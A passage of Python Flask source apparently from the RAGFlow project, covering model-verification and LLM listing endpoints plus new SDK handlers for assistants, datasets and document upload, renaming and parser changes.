            arr, tc = mdl.similarity("Hello~ Ragflower!", ["Hi, there!"])
            if len(arr) == 0 or tc == 0:
                raise Exception("Not known.")
        except Exception as e:
            msg += f"\nFail to access model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.IMAGE2TEXT.value:
        mdl = CvModel[factory](
            key=llm["api_key"],
            model_name=llm["llm_name"],
            base_url=llm["api_base"]
        )
        try:
            img_url = (
                "https://upload.wikimedia.org/wikipedia/comm"
                "ons/thumb/d/dd/Gfp-wisconsin-madison-the-nature-boardwalk.jpg/256"
                "0px-Gfp-wisconsin-madison-the-nature-boardwalk.jpg"
            )
            res = requests.get(img_url)
            if res.status_code == 200:
                m, tc = mdl.describe(res.content)
                if not tc:
                    raise Exception(m)
            else:
                pass
        except Exception as e:
            msg += f"\nFail to access model({llm['llm_name']})." + str(e)
    elif llm["model_type"] == LLMType.TTS:
        mdl = TTSModel[factory](
            key=llm["api_key"], model_name=llm["llm_name"], base_url=llm["api_base"]
        )
        try:
            for resp in mdl.tts("Hello~ Ragflower!"):
                pass
        except RuntimeError as e:
            msg += f"\nFail to access model({llm['llm_name']})." + str(e)
    else:
        # TODO: check other type of models
        pass

    if msg:
        return get_data_error_result(retmsg=msg)

    if not TenantLLMService.filter_update(
            [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == factory, TenantLLM.llm_name == llm["llm_name"]], llm):
        TenantLLMService.save(**llm)

    return get_json_result(data=True)
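

# Note on the hand-assembled api_key strings above: the VolcEngine and Bedrock
# branches end the literal with ", }", a trailing comma that strict json.loads
# would reject, so whatever parses them must be tolerant of that. A sketch of a
# safer construction (an alternative, not the code's current behavior):
def _example_composite_api_key(ark_api_key, endpoint_id):
    import json
    # json.dumps guarantees well-formed JSON with no trailing comma.
    return json.dumps({"ark_api_key": ark_api_key, "ep_id": endpoint_id})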


@manager.route('/delete_llm', methods=['POST'])
@login_required
@validate_request("llm_factory", "llm_name")
def delete_llm():
    req = request.json
    TenantLLMService.filter_delete(
        [TenantLLM.tenant_id == current_user.id, TenantLLM.llm_factory == req["llm_factory"], TenantLLM.llm_name == req["llm_name"]])
    return get_json_result(data=True)


@manager.route('/my_llms', methods=['GET'])
@login_required
def my_llms():
    try:
        res = {}
        for o in TenantLLMService.get_my_llms(current_user.id):
            if o["llm_factory"] not in res:
                res[o["llm_factory"]] = {
                    "tags": o["tags"],
                    "llm": []
                }
            res[o["llm_factory"]]["llm"].append({
                "type": o["model_type"],
                "name": o["llm_name"],
                "used_token": o["used_tokens"]
            })
        return get_json_result(data=res)
    except Exception as e:
        return server_error_response(e)


@manager.route('/list', methods=['GET'])
@login_required
def list_app():
    model_type = request.args.get("model_type")
    try:
        objs = TenantLLMService.query(tenant_id=current_user.id)
        facts = set([o.to_dict()["llm_factory"] for o in objs if o.api_key])
        llms = LLMService.get_all()
        llms = [m.to_dict()
                for m in llms if m.status == StatusEnum.VALID.value]
        for m in llms:
            m["available"] = m["fid"] in facts or m["llm_name"].lower() == "flag-embedding" or m["fid"] in ["Youdao", "FastEmbed", "BAAI"]

        llm_set = set([m["llm_name"] for m in llms])
        for o in objs:
            if not o.api_key:
                continue
            if o.llm_name in llm_set:
                continue
            llms.append({"llm_name": o.llm_name, "model_type": o.model_type, "fid": o.llm_factory, "available": True})

        res = {}
        for m in llms:
            if model_type and m["model_type"].find(model_type) < 0:
                continue
            if m["fid"] not in res:
                res[m["fid"]] = []
            res[m["fid"]].append(m)

        return get_json_result(data=res)
    except Exception as e:
        return server_error_response(e)
api/apps/sdk/assistant.py (new file, 304 lines)
@@ -0,0 +1,304 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from flask import request

from api.db import StatusEnum
from api.db.db_models import TenantLLM
from api.db.services.dialog_service import DialogService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMService, TenantLLMService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import get_data_error_result, token_required
from api.utils.api_utils import get_json_result


@manager.route('/save', methods=['POST'])
@token_required
def save(tenant_id):
    req = request.json
    # dataset
    if req.get("knowledgebases") == []:
        return get_data_error_result(retmsg="knowledgebases can not be empty list")
    kb_list = []
    if req.get("knowledgebases"):
        for kb in req.get("knowledgebases"):
            if not kb["id"]:
                return get_data_error_result(retmsg="knowledgebase needs id")
            if not KnowledgebaseService.query(id=kb["id"], tenant_id=tenant_id):
                return get_data_error_result(retmsg="you do not own the knowledgebase")
            # if not DocumentService.query(kb_id=kb["id"]):
            #     return get_data_error_result(retmsg="There is a invalid knowledgebase")
            kb_list.append(kb["id"])
    req["kb_ids"] = kb_list
    # llm
    llm = req.get("llm")
    if llm:
        if "model_name" in llm:
            req["llm_id"] = llm.pop("model_name")
        req["llm_setting"] = req.pop("llm")
    e, tenant = TenantService.get_by_id(tenant_id)
    if not e:
        return get_data_error_result(retmsg="Tenant not found!")
    # prompt
    prompt = req.get("prompt")
    key_mapping = {"parameters": "variables",
                   "prologue": "opener",
                   "quote": "show_quote",
                   "system": "prompt",
                   "rerank_id": "rerank_model",
                   "vector_similarity_weight": "keywords_similarity_weight"}
    key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
    if prompt:
        for new_key, old_key in key_mapping.items():
            if old_key in prompt:
                prompt[new_key] = prompt.pop(old_key)
        for key in key_list:
            if key in prompt:
                req[key] = prompt.pop(key)
        req["prompt_config"] = req.pop("prompt")
    # create
    if "id" not in req:
        # dataset
        if not kb_list:
            return get_data_error_result(retmsg="knowledgebases are required!")
        # init
        req["id"] = get_uuid()
        req["description"] = req.get("description", "A helpful Assistant")
        req["icon"] = req.get("avatar", "")
        req["top_n"] = req.get("top_n", 6)
        req["top_k"] = req.get("top_k", 1024)
        req["rerank_id"] = req.get("rerank_id", "")
        if req.get("llm_id"):
            if not TenantLLMService.query(llm_name=req["llm_id"]):
                return get_data_error_result(retmsg="the model_name does not exist.")
        else:
            req["llm_id"] = tenant.llm_id
        if not req.get("name"):
            return get_data_error_result(retmsg="name is required.")
        if DialogService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value):
            return get_data_error_result(retmsg="Duplicated assistant name in creating dataset.")
        # tenant_id
        if req.get("tenant_id"):
            return get_data_error_result(retmsg="tenant_id must not be provided.")
        req["tenant_id"] = tenant_id
        # prompt more parameter
        default_prompt = {
            # The system prompt below is Chinese; roughly: "You are an intelligent
            # assistant. Summarize the knowledge base content to answer, citing its
            # data in detail. When nothing in the knowledge base is relevant, the
            # reply must include 'No answer found in the knowledge base!'. Take the
            # chat history into account."
            "system": """你是一个智能助手,请总结知识库的内容来回答问题,请列举知识库中的数据详细回答。当所有知识库内容都与问题无关时,你的回答必须包括“知识库中未找到您要的答案!”这句话。回答需要考虑聊天历史。
以下是知识库:
{knowledge}
以上是知识库。""",
            # Opener, roughly: "Hi, I'm your assistant, what can I do for you?"
            "prologue": "您好,我是您的助手小樱,长得可爱又善良,can I help you?",
            "parameters": [
                {"key": "knowledge", "optional": False}
            ],
            # Empty-recall reply, roughly: "Sorry! Nothing relevant found in the knowledge base!"
            "empty_response": "Sorry! 知识库中未找到相关内容!"
        }
        key_list_2 = ["system", "prologue", "parameters", "empty_response"]
        if "prompt_config" not in req:
            req['prompt_config'] = {}
        for key in key_list_2:
|
||||
temp = req['prompt_config'].get(key)
|
||||
if not temp:
|
||||
req['prompt_config'][key] = default_prompt[key]
|
||||
for p in req['prompt_config']["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if req['prompt_config']["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(
|
||||
retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
# save
|
||||
if not DialogService.save(**req):
|
||||
return get_data_error_result(retmsg="Fail to new an assistant!")
|
||||
# response
|
||||
e, res = DialogService.get_by_id(req["id"])
|
||||
if not e:
|
||||
return get_data_error_result(retmsg="Fail to new an assistant!")
|
||||
res = res.to_json()
|
||||
renamed_dict = {}
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = req["knowledgebases"]
|
||||
res["avatar"] = res.pop("icon")
|
||||
return get_json_result(data=res)
|
||||
else:
|
||||
# authorization
|
||||
if not DialogService.query(tenant_id=tenant_id, id=req["id"], status=StatusEnum.VALID.value):
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant', retcode=RetCode.OPERATING_ERROR)
|
||||
# prompt
|
||||
if not req["id"]:
|
||||
return get_data_error_result(retmsg="id can not be empty")
|
||||
e, res = DialogService.get_by_id(req["id"])
|
||||
res = res.to_json()
|
||||
if "llm_id" in req:
|
||||
if not TenantLLMService.query(llm_name=req["llm_id"]):
|
||||
return get_data_error_result(retmsg="the model_name does not exist.")
|
||||
if "name" in req:
|
||||
if not req.get("name"):
|
||||
return get_data_error_result(retmsg="name is not empty.")
|
||||
if req["name"].lower() != res["name"].lower() \
|
||||
and len(
|
||||
DialogService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value)) > 0:
|
||||
return get_data_error_result(retmsg="Duplicated assistant name in updating dataset.")
|
||||
if "prompt_config" in req:
|
||||
res["prompt_config"].update(req["prompt_config"])
|
||||
for p in res["prompt_config"]["parameters"]:
|
||||
if p["optional"]:
|
||||
continue
|
||||
if res["prompt_config"]["system"].find("{%s}" % p["key"]) < 0:
|
||||
return get_data_error_result(retmsg="Parameter '{}' is not used".format(p["key"]))
|
||||
if "llm_setting" in req:
|
||||
res["llm_setting"].update(req["llm_setting"])
|
||||
req["prompt_config"] = res["prompt_config"]
|
||||
req["llm_setting"] = res["llm_setting"]
|
||||
# avatar
|
||||
if "avatar" in req:
|
||||
req["icon"] = req.pop("avatar")
|
||||
assistant_id = req.pop("id")
|
||||
if "knowledgebases" in req:
|
||||
req.pop("knowledgebases")
|
||||
if not DialogService.update_by_id(assistant_id, req):
|
||||
return get_data_error_result(retmsg="Assistant not found!")
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/delete', methods=['DELETE'])
|
||||
@token_required
|
||||
def delete(tenant_id):
|
||||
req = request.args
|
||||
if "id" not in req:
|
||||
return get_data_error_result(retmsg="id is required")
|
||||
id = req['id']
|
||||
if not DialogService.query(tenant_id=tenant_id, id=id, status=StatusEnum.VALID.value):
|
||||
return get_json_result(data=False, retmsg='you do not own the assistant.', retcode=RetCode.OPERATING_ERROR)
|
||||
|
||||
temp_dict = {"status": StatusEnum.INVALID.value}
|
||||
DialogService.update_by_id(req["id"], temp_dict)
|
||||
return get_json_result(data=True)
|
||||
|
||||
|
||||
@manager.route('/get', methods=['GET'])
|
||||
@token_required
|
||||
def get(tenant_id):
|
||||
req = request.args
|
||||
if "id" in req:
|
||||
id = req["id"]
|
||||
ass = DialogService.query(tenant_id=tenant_id, id=id, status=StatusEnum.VALID.value)
|
||||
if not ass:
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant.', retcode=RetCode.OPERATING_ERROR)
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
if ass[0].name != name:
|
||||
return get_json_result(data=False, retmsg='name does not match id.', retcode=RetCode.OPERATING_ERROR)
|
||||
res = ass[0].to_json()
|
||||
else:
|
||||
if "name" in req:
|
||||
name = req["name"]
|
||||
ass = DialogService.query(name=name, tenant_id=tenant_id, status=StatusEnum.VALID.value)
|
||||
if not ass:
|
||||
return get_json_result(data=False, retmsg='You do not own the assistant.',
|
||||
retcode=RetCode.OPERATING_ERROR)
|
||||
res = ass[0].to_json()
|
||||
else:
|
||||
return get_data_error_result(retmsg="At least one of `id` or `name` must be provided.")
|
||||
renamed_dict = {}
|
||||
key_mapping = {"parameters": "variables",
|
||||
"prologue": "opener",
|
||||
"quote": "show_quote",
|
||||
"system": "prompt",
|
||||
"rerank_id": "rerank_model",
|
||||
"vector_similarity_weight": "keywords_similarity_weight"}
|
||||
key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
kb_list = []
|
||||
for kb_id in res["kb_ids"]:
|
||||
kb = KnowledgebaseService.query(id=kb_id)
|
||||
kb_list.append(kb[0].to_json())
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = kb_list
|
||||
res["avatar"] = res.pop("icon")
|
||||
return get_json_result(data=res)
|
||||
|
||||
|
||||
@manager.route('/list', methods=['GET'])
|
||||
@token_required
|
||||
def list_assistants(tenant_id):
|
||||
assts = DialogService.query(
|
||||
tenant_id=tenant_id,
|
||||
status=StatusEnum.VALID.value,
|
||||
reverse=True,
|
||||
order_by=DialogService.model.create_time)
|
||||
assts = [d.to_dict() for d in assts]
|
||||
list_assts = []
|
||||
renamed_dict = {}
|
||||
key_mapping = {"parameters": "variables",
|
||||
"prologue": "opener",
|
||||
"quote": "show_quote",
|
||||
"system": "prompt",
|
||||
"rerank_id": "rerank_model",
|
||||
"vector_similarity_weight": "keywords_similarity_weight"}
|
||||
key_list = ["similarity_threshold", "vector_similarity_weight", "top_n", "rerank_id"]
|
||||
for res in assts:
|
||||
for key, value in res["prompt_config"].items():
|
||||
new_key = key_mapping.get(key, key)
|
||||
renamed_dict[new_key] = value
|
||||
res["prompt"] = renamed_dict
|
||||
del res["prompt_config"]
|
||||
new_dict = {"similarity_threshold": res["similarity_threshold"],
|
||||
"keywords_similarity_weight": res["vector_similarity_weight"],
|
||||
"top_n": res["top_n"],
|
||||
"rerank_model": res['rerank_id']}
|
||||
res["prompt"].update(new_dict)
|
||||
for key in key_list:
|
||||
del res[key]
|
||||
res["llm"] = res.pop("llm_setting")
|
||||
res["llm"]["model_name"] = res.pop("llm_id")
|
||||
kb_list = []
|
||||
for kb_id in res["kb_ids"]:
|
||||
kb = KnowledgebaseService.query(id=kb_id)
|
||||
kb_list.append(kb[0].to_json())
|
||||
del res["kb_ids"]
|
||||
res["knowledgebases"] = kb_list
|
||||
res["avatar"] = res.pop("icon")
|
||||
list_assts.append(res)
|
||||
return get_json_result(data=list_assts)
|
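The /save handler above accepts the client-facing key names (variables, opener, show_quote, rerank_model) and renames them to the internal dialog fields. A hedged sketch of creating an assistant over HTTP; the base URL, the /v1/assistant mount point, the Bearer header format expected by token_required, and the placeholder ids are all assumptions:

# Hedged sketch, not part of this diff: create an assistant via /save.
import requests

BASE = "http://localhost:9380/v1/assistant"      # assumed mount point
HEADERS = {"Authorization": "Bearer <API_KEY>"}  # assumed token format

payload = {
    "name": "my-assistant",
    "knowledgebases": [{"id": "<kb_id>"}],       # must be knowledgebases you own
    "llm": {"model_name": "<llm_id>"},           # renamed server-side to llm_id
    "prompt": {"opener": "Hello!"},              # client-facing keys, remapped by save()
}
r = requests.post(f"{BASE}/save", json=payload, headers=HEADERS)
print(r.json())  # response carries the remapped "prompt", "llm" and "knowledgebases"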
224
api/apps/sdk/dataset.py
Normal file
@ -0,0 +1,224 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#

from flask import request

from api.db import StatusEnum, FileSource
from api.db.db_models import File
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.user_service import TenantService
from api.settings import RetCode
from api.utils import get_uuid
from api.utils.api_utils import get_json_result, token_required, get_data_error_result


@manager.route('/save', methods=['POST'])
@token_required
def save(tenant_id):
    req = request.json
    e, t = TenantService.get_by_id(tenant_id)
    if "id" not in req:
        if "tenant_id" in req or "embedding_model" in req:
            return get_data_error_result(
                retmsg="Tenant_id or embedding_model must not be provided")
        if "name" not in req:
            return get_data_error_result(
                retmsg="Name cannot be empty!")
        req['id'] = get_uuid()
        req["name"] = req["name"].strip()
        if req["name"] == "":
            return get_data_error_result(
                retmsg="Name cannot be an empty string!")
        if KnowledgebaseService.query(name=req["name"], tenant_id=tenant_id, status=StatusEnum.VALID.value):
            return get_data_error_result(
                retmsg="Duplicated knowledgebase name in creating dataset.")
        req["tenant_id"] = req['created_by'] = tenant_id
        req['embedding_model'] = t.embd_id
        key_mapping = {
            "chunk_num": "chunk_count",
            "doc_num": "document_count",
            "parser_id": "parse_method",
            "embd_id": "embedding_model"
        }
        mapped_keys = {new_key: req[old_key] for new_key, old_key in key_mapping.items() if old_key in req}
        req.update(mapped_keys)
        if not KnowledgebaseService.save(**req):
            return get_data_error_result(retmsg="Create dataset error.(Database error)")
        renamed_data = {}
        e, k = KnowledgebaseService.get_by_id(req["id"])
        for key, value in k.to_dict().items():
            new_key = key_mapping.get(key, key)
            renamed_data[new_key] = value
        return get_json_result(data=renamed_data)
    else:
        invalid_keys = {"embd_id", "chunk_num", "doc_num", "parser_id"}
        if any(key in req for key in invalid_keys):
            return get_data_error_result(retmsg="The input parameters are invalid.")

        if "tenant_id" in req:
            if req["tenant_id"] != tenant_id:
                return get_data_error_result(
                    retmsg="Can't change tenant_id.")

        if "embedding_model" in req:
            if req["embedding_model"] != t.embd_id:
                return get_data_error_result(
                    retmsg="Can't change embedding_model.")
            req.pop("embedding_model")

        if not KnowledgebaseService.query(
                created_by=tenant_id, id=req["id"]):
            return get_json_result(
                data=False, retmsg='You do not own the dataset.',
                retcode=RetCode.OPERATING_ERROR)

        if not req["id"]:
            return get_data_error_result(
                retmsg="id cannot be empty.")
        e, kb = KnowledgebaseService.get_by_id(req["id"])

        if "chunk_count" in req:
            if req["chunk_count"] != kb.chunk_num:
                return get_data_error_result(
                    retmsg="Can't change chunk_count.")
            req.pop("chunk_count")

        if "document_count" in req:
            if req['document_count'] != kb.doc_num:
                return get_data_error_result(
                    retmsg="Can't change document_count.")
            req.pop("document_count")

        if "parse_method" in req:
            if kb.chunk_num != 0 and req['parse_method'] != kb.parser_id:
                return get_data_error_result(
                    retmsg="If chunk count is not 0, parse method is not changeable.")
            req['parser_id'] = req.pop('parse_method')
        if "name" in req:
            req["name"] = req["name"].strip()
            if req["name"].lower() != kb.name.lower() \
                    and len(KnowledgebaseService.query(name=req["name"], tenant_id=tenant_id,
                                                       status=StatusEnum.VALID.value)) > 0:
                return get_data_error_result(
                    retmsg="Duplicated knowledgebase name in updating dataset.")

        del req["id"]
        if not KnowledgebaseService.update_by_id(kb.id, req):
            return get_data_error_result(retmsg="Update dataset error.(Database error)")
        return get_json_result(data=True)


@manager.route('/delete', methods=['DELETE'])
@token_required
def delete(tenant_id):
    req = request.args
    if "id" not in req:
        return get_data_error_result(
            retmsg="id is required")
    kbs = KnowledgebaseService.query(
        created_by=tenant_id, id=req["id"])
    if not kbs:
        return get_json_result(
            data=False, retmsg='You do not own the dataset',
            retcode=RetCode.OPERATING_ERROR)

    for doc in DocumentService.query(kb_id=req["id"]):
        if not DocumentService.remove_document(doc, kbs[0].tenant_id):
            return get_data_error_result(
                retmsg="Remove document error.(Database error)")
        f2d = File2DocumentService.get_by_document_id(doc.id)
        FileService.filter_delete([File.source_type == FileSource.KNOWLEDGEBASE, File.id == f2d[0].file_id])
        File2DocumentService.delete_by_document_id(doc.id)

    if not KnowledgebaseService.delete_by_id(req["id"]):
        return get_data_error_result(
            retmsg="Delete dataset error.(Database error)")
    return get_json_result(data=True)


@manager.route('/list', methods=['GET'])
@token_required
def list_datasets(tenant_id):
    page_number = int(request.args.get("page", 1))
    items_per_page = int(request.args.get("page_size", 1024))
    orderby = request.args.get("orderby", "create_time")
    # note: bool() on any non-empty query string (even "false") is True,
    # so an explicit desc parameter always keeps descending order here
    desc = bool(request.args.get("desc", True))
    tenants = TenantService.get_joined_tenants_by_user_id(tenant_id)
    kbs = KnowledgebaseService.get_by_tenant_ids(
        [m["tenant_id"] for m in tenants], tenant_id, page_number, items_per_page, orderby, desc)
    renamed_list = []
    for kb in kbs:
        key_mapping = {
            "chunk_num": "chunk_count",
            "doc_num": "document_count",
            "parser_id": "parse_method",
            "embd_id": "embedding_model"
        }
        renamed_data = {}
        for key, value in kb.items():
            new_key = key_mapping.get(key, key)
            renamed_data[new_key] = value
        renamed_list.append(renamed_data)
    return get_json_result(data=renamed_list)


@manager.route('/detail', methods=['GET'])
@token_required
def detail(tenant_id):
    req = request.args
    key_mapping = {
        "chunk_num": "chunk_count",
        "doc_num": "document_count",
        "parser_id": "parse_method",
        "embd_id": "embedding_model"
    }
    renamed_data = {}
    if "id" in req:
        id = req["id"]
        kb = KnowledgebaseService.query(created_by=tenant_id, id=req["id"])
        if not kb:
            return get_json_result(
                data=False, retmsg='You do not own the dataset.',
                retcode=RetCode.OPERATING_ERROR)
        if "name" in req:
            name = req["name"]
            if kb[0].name != name:
                return get_json_result(
                    data=False, retmsg='You do not own the dataset.',
                    retcode=RetCode.OPERATING_ERROR)
        e, k = KnowledgebaseService.get_by_id(id)
        for key, value in k.to_dict().items():
            new_key = key_mapping.get(key, key)
            renamed_data[new_key] = value
        return get_json_result(data=renamed_data)
    else:
        if "name" in req:
            name = req["name"]
            e, k = KnowledgebaseService.get_by_name(kb_name=name, tenant_id=tenant_id)
            if not e:
                return get_json_result(
                    data=False, retmsg='You do not own the dataset.',
                    retcode=RetCode.OPERATING_ERROR)
            for key, value in k.to_dict().items():
                new_key = key_mapping.get(key, key)
                renamed_data[new_key] = value
            return get_json_result(data=renamed_data)
        else:
            return get_data_error_result(
                retmsg="At least one of `id` or `name` must be provided.")
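The dataset endpoints rename internal model fields (chunk_num, doc_num, parser_id, embd_id) to client-facing names on the way out. A hedged usage sketch; the base URL, the /v1/dataset mount point, and the Bearer header format are assumptions:

# Hedged sketch, not part of this diff: create a dataset, then list datasets.
import requests

BASE = "http://localhost:9380/v1/dataset"        # assumed mount point
HEADERS = {"Authorization": "Bearer <API_KEY>"}  # assumed token format

r = requests.post(f"{BASE}/save", json={"name": "demo-kb"}, headers=HEADERS)
created = r.json()["data"]                       # keys come back renamed, e.g. chunk_count

r = requests.get(f"{BASE}/list", params={"page": 1, "page_size": 32}, headers=HEADERS)
for kb in r.json()["data"]:
    print(kb["name"], kb["document_count"], kb["embedding_model"])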
529
api/apps/sdk/doc.py
Normal file
@ -0,0 +1,529 @@
import pathlib
import re
import datetime
import json
import traceback
import hashlib

from functools import partial
from io import BytesIO

from flask import request, send_file
from flask_login import login_required, current_user
from elasticsearch_dsl import Q

from rag.app.qa import rmPrefix, beAdoc
from rag.app import book, laws, manual, naive, one, paper, presentation, qa, resume, table, picture, audio, email
from rag.nlp import search, rag_tokenizer, keyword_extraction
from rag.utils import rmSpace
from rag.utils.es_conn import ELASTICSEARCH
from rag.utils.storage_factory import STORAGE_IMPL

from api.db import LLMType, ParserType, FileSource, TaskStatus, FileType
from api.db.db_models import Task, File
from api.db.services.document_service import DocumentService
from api.db.services.file2document_service import File2DocumentService
from api.db.services.file_service import FileService
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import TenantLLMService
from api.db.services.task_service import TaskService, queue_tasks
from api.db.services.user_service import TenantService, UserTenantService
from api.settings import RetCode, retrievaler, kg_retrievaler
from api.utils.api_utils import server_error_response, get_data_error_result, validate_request
from api.utils.api_utils import get_json_result, token_required
from api.utils.api_utils import construct_json_result, construct_error_response

MAXIMUM_OF_UPLOADING_FILES = 256


@manager.route('/dataset/<dataset_id>/documents/upload', methods=['POST'])
@token_required
def upload(dataset_id, tenant_id):
    if 'file' not in request.files:
        return get_json_result(
            data=False, retmsg='No file part!', retcode=RetCode.ARGUMENT_ERROR)
    file_objs = request.files.getlist('file')
    for file_obj in file_objs:
        if file_obj.filename == '':
            return get_json_result(
                data=False, retmsg='No file selected!', retcode=RetCode.ARGUMENT_ERROR)
    e, kb = KnowledgebaseService.get_by_id(dataset_id)
    if not e:
        raise LookupError(f"Can't find the knowledgebase with ID {dataset_id}!")
    err, _ = FileService.upload_document(kb, file_objs, tenant_id)
    if err:
        return get_json_result(
            data=False, retmsg="\n".join(err), retcode=RetCode.SERVER_ERROR)
    return get_json_result(data=True)


@manager.route('/infos', methods=['GET'])
@token_required
def docinfos(tenant_id):
    req = request.args
    if "id" in req:
        doc_id = req["id"]
        e, doc = DocumentService.get_by_id(doc_id)
        return get_json_result(data=doc.to_json())
    if "name" in req:
        doc_name = req["name"]
        doc_id = DocumentService.get_doc_id_by_doc_name(doc_name)
        e, doc = DocumentService.get_by_id(doc_id)
        return get_json_result(data=doc.to_json())


@manager.route('/save', methods=['POST'])
@token_required
def save_doc(tenant_id):
    req = request.json
    # get the doc by id or name
    doc_id = None
    if "id" in req:
        doc_id = req["id"]
    elif "name" in req:
        doc_name = req["name"]
        doc_id = DocumentService.get_doc_id_by_doc_name(doc_name)
    if not doc_id:
        return get_json_result(retcode=400, retmsg="Document ID or name is required")
    e, doc = DocumentService.get_by_id(doc_id)
    if not e:
        return get_data_error_result(retmsg="Document not found!")
    # other values can't be changed
    if "chunk_num" in req:
        if req["chunk_num"] != doc.chunk_num:
            return get_data_error_result(
                retmsg="Can't change chunk_count.")
    if "progress" in req:
        if req['progress'] != doc.progress:
            return get_data_error_result(
                retmsg="Can't change progress.")
    # change name or parse_method
    if "name" in req and req["name"] != doc.name:
        try:
            if pathlib.Path(req["name"].lower()).suffix != pathlib.Path(
                    doc.name.lower()).suffix:
                return get_json_result(
                    data=False,
                    retmsg="The extension of file can't be changed",
                    retcode=RetCode.ARGUMENT_ERROR)
            for d in DocumentService.query(name=req["name"], kb_id=doc.kb_id):
                if d.name == req["name"]:
                    return get_data_error_result(
                        retmsg="Duplicated document name in the same knowledgebase.")

            if not DocumentService.update_by_id(
                    doc_id, {"name": req["name"]}):
                return get_data_error_result(
                    retmsg="Database error (Document rename)!")

            informs = File2DocumentService.get_by_document_id(doc_id)
            if informs:
                e, file = FileService.get_by_id(informs[0].file_id)
                FileService.update_by_id(file.id, {"name": req["name"]})
        except Exception as e:
            return server_error_response(e)
    if "parser_id" in req:
        try:
            if doc.parser_id.lower() == req["parser_id"].lower():
                if "parser_config" in req:
                    if req["parser_config"] == doc.parser_config:
                        return get_json_result(data=True)
                else:
                    return get_json_result(data=True)

            if doc.type == FileType.VISUAL or re.search(
                    r"\.(ppt|pptx|pages)$", doc.name):
                return get_data_error_result(retmsg="Not supported yet!")

            e = DocumentService.update_by_id(doc.id,
                                             {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
                                              "run": TaskStatus.UNSTART.value})
            if not e:
                return get_data_error_result(retmsg="Document not found!")
            if "parser_config" in req:
                DocumentService.update_parser_config(doc.id, req["parser_config"])
            if doc.token_num > 0:
                e = DocumentService.increment_chunk_num(doc.id, doc.kb_id, doc.token_num * -1, doc.chunk_num * -1,
                                                        doc.process_duation * -1)
                if not e:
                    return get_data_error_result(retmsg="Document not found!")
                # the document may have been looked up by name, so use the resolved doc_id
                tenant_id = DocumentService.get_tenant_id(doc_id)
                if not tenant_id:
                    return get_data_error_result(retmsg="Tenant not found!")
                ELASTICSEARCH.deleteByQuery(
                    Q("match", doc_id=doc.id), idxnm=search.index_name(tenant_id))
        except Exception as e:
            return server_error_response(e)
    return get_json_result(data=True)


@manager.route('/change_parser', methods=['POST'])
@token_required
def change_parser(tenant_id):
    req = request.json
    try:
        e, doc = DocumentService.get_by_id(req["doc_id"])
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if doc.parser_id.lower() == req["parser_id"].lower():
            if "parser_config" in req:
                if req["parser_config"] == doc.parser_config:
                    return get_json_result(data=True)
            else:
                return get_json_result(data=True)

        if doc.type == FileType.VISUAL or re.search(
                r"\.(ppt|pptx|pages)$", doc.name):
            return get_data_error_result(retmsg="Not supported yet!")

        e = DocumentService.update_by_id(doc.id,
                                         {"parser_id": req["parser_id"], "progress": 0, "progress_msg": "",
                                          "run": TaskStatus.UNSTART.value})
        if not e:
            return get_data_error_result(retmsg="Document not found!")
        if "parser_config" in req:
            DocumentService.update_parser_config(doc.id, req["parser_config"])
        if doc.token_num > 0:
